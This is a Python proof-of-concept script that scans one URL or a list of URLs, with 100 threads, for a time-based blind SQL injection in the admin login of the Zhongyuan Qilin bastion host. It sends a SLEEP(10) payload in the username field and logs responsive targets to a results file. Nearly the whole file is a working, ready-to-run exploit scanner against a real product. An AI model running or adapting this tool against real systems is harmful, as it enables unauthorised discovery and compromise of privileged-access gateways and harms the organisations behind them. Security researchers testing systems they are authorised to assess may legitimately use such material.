#中远麒麟堡垒机SQL注入漏洞
import requests,sys,argparse,re,json
from multiprocessing.dummy import Pool
requests.packages.urllib3.disable_warnings()

def banner():
     test="""  ________     ______  _          _ 
 |___  /\ \   / /  _ \| |        | |
    / /  \ \_/ /| |_) | |        | |
   / /    \   / |  _ <| |    _   | |
  / /__    | |  | |_) | |___| |__| |
 /_____|   |_|  |____/|______\____/ 
                        version=1.0.0  
                                    
                                    

 """
     print(test)

def main():
    banner()
    parsers=argparse.ArgumentParser(description='中远麒麟堡垒机SQL注入漏洞')
    parsers.add_argument('-u','--url',dest='url',type=str,help='please input your url')
    parsers.add_argument('-f','--file',dest='file',type=str,help='please input your filepath')
    args=parsers.parse_args()

    if args.url and not args.file:
        poc(args.url)
    elif args.file and not args.url:
        url_list=[]
        with open(args.file,'r',encoding='utf-8') as fp:
            for url in fp.readlines():
                url_list.append(url.strip())
        mp=Pool(100)
        #mp.map(poc, url_list) 的作用是并行地对 url_list 中的每个 URL 执行 poc 函数（或方法）
        mp.map(poc,url_list)
        mp.close()
        mp.join()
    else:
        print(f"usag:\n\t python {sys.argv[0]} -h")
def poc(target):
    payload='/admin.php?controller=admin_commonuser'
    headers = {
        'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36',
        'Connection':'close',
        'Content-Length':'78',
        'Accept':'*/*',
        'Content-Type':'application/x-www-form-urlencoded',
        'Accept-Encoding':'gzip',
    }
    data1="username=admin&authtype=localauth&password=admin"
    data="username=admin' AND (SELECT 12 FROM (SELECT(SLEEP(10)))ptGN) AND 'AAdm'='AAdmv"
    proxies = {
        'http':'http://127.0.0.1:8080',
        'https':'http://127.0.0.1:8080'
    }
   
    try:
        res1=requests.post(url=target+payload,headers=headers,proxies=proxies,verify=False,data=data1)
        res2=requests.post(url=target+payload,headers=headers,proxies=proxies,verify=False,data=data)
        time1=res1.elapsed.total_seconds()
        time2=res2.elapsed.total_seconds()
        if time2-time1>=9:
                    print(f"[+]目标存在延时注入 {target}")
                    with open('result.txt','a') as f:
                        f.write(target+'\n')
        else:
             print(f'[-]目标不存在漏洞 {target}')
    except:
        pass


if __name__ == '__main__':
    main()
